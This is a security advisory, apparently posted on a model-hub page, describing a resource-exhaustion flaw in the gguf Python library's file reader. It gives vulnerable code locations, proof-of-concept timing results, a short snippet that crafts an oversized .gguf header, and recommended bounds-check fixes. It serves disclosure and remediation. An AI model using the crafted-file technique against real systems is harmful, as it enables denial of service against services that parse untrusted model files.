YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
gguf Python Library Validation Bypass β CVSS 5.5 (Medium)
Target: gguf (PyPI), v0.19.0 CWE: CWE-20 (Improper Input Validation) / CWE-400 (Uncontrolled Resource Consumption) CVSS 3.1: AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H (5.5)
Vulnerability Summary
The gguf Python library's GGUFReader performs no upper-bound validation on count/size fields in the GGUF binary format header, allowing crafted .gguf files to cause CPU exhaustion and memory amplification.
Vulnerable Code Paths (gguf_reader.py)
| # | Code Location | Issue |
|---|---|---|
| 1 | _build_tensor_info() line 312 |
for _ in range(tensor_count) β uint64, no upper bound |
| 2 | _build_fields() line 289 |
for _ in range(kv_count) β uint64, no upper bound |
| 3 | _get_field_parts() line 247 |
for idx in range(alen[0]) β uint64, no upper bound |
| 4 | _get_str() line 218 |
self._get(offset+8, np.uint8, slen[0]) β uint64 length |
| 5 | _build_tensors() line 329 |
n_elems = int(np.prod(dims)) β uint64 overflow |
Protected Behaviors (Defenses)
| # | Issue | Status |
|---|---|---|
| 1 | Duplicate tensor names | PROTECTED β explicit check line 326 |
| 2 | Duplicate KV keys | PROTECTED β explicit check line 208 |
| 3 | Integer overflow exploit | MITIGATED β NumPy reshape catches size mismatch |
| 4 | Data offset past EOF | MITIGATED β reshape catches size mismatch |
PoC Results
| Attack Vector | Size | Iterations | CPU Time |
|---|---|---|---|
| tensor_count = 500,000 | 19 MB | 500k | 25.5s |
| kv_count = 500,000 | 10 MB | 500k | 14.5s |
| ARRAY alen = 1,000,000 | 1 MB | 1M | 7.1s |
| Combined: 10k KV Γ 1k ARRAY | 10 MB | 10M | 67s |
| String key 50MB | 48 MB | β | +95 MB RSS |
| Zero-dim tensor [0,0] | <1 KB | β | Accepted silently |
Reproduction
# PoC 1: CPU DoS via 500k tensors
import struct, tempfile
from gguf.gguf_reader import GGUFReader
# Build craft file
data = struct.pack('<I', 0x46554747) # magic
data += struct.pack('<I', 3) # version
data += struct.pack('<QQ', 500000, 0) # tensor_count=500k, kv_count=0
# + 500k tensor entries + padding + data
# Full PoC: see poc_gguf_bypass.py
tmp = tempfile.NamedTemporaryFile(suffix='.gguf', delete=False)
tmp.write(data); tmp.close()
reader = GGUFReader(tmp.name, mode='r') # ~25s CPU for 19MB file
Fix Recommendations
- Add upper bounds to all count fields:
MAX_TENSOR_COUNT = 100_000
MAX_KV_COUNT = 100_000
MAX_ARRAY_LENGTH = 1_000_000
MAX_STRING_LENGTH = 10_000_000 # 10 MB
MAX_DIM_COUNT = 16
MAX_DIM_VALUE = 2**31 - 1
if tensor_count > MAX_TENSOR_COUNT:
raise ValueError(f"tensor_count {tensor_count} exceeds maximum {MAX_TENSOR_COUNT}")
- Validate string length before allocation (in
_get_str()):
def _get_str(self, offset):
slen = self._get(offset, np.uint64)
if slen[0] > MAX_STRING_LENGTH:
raise ValueError(f"String length {slen[0]} exceeds maximum")
return slen, self._get(offset + 8, np.uint8, slen[0])
- Validate tensor dimensions (in
_build_tensors()):
if n_dims > MAX_DIM_COUNT:
raise ValueError(f"Dimension count {n_dims} exceeds maximum")
if any(d > MAX_DIM_VALUE for d in dims):
raise ValueError(f"Dimension value exceeds maximum")
if any(d == 0 for d in dims):
raise ValueError(f"Zero dimension not allowed")
- Validate n_elems against uint64 limits:
n_elems = int(np.prod(dims.astype(np.float64))) # Use float64 to detect overflow
if n_elems > 2**63:
raise ValueError(f"Total elements {n_elems} exceeds safe limit")
- Downloads last month
- 17
Hardware compatibility
Log In to add your hardware
We're not able to determine the quantization variants.
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support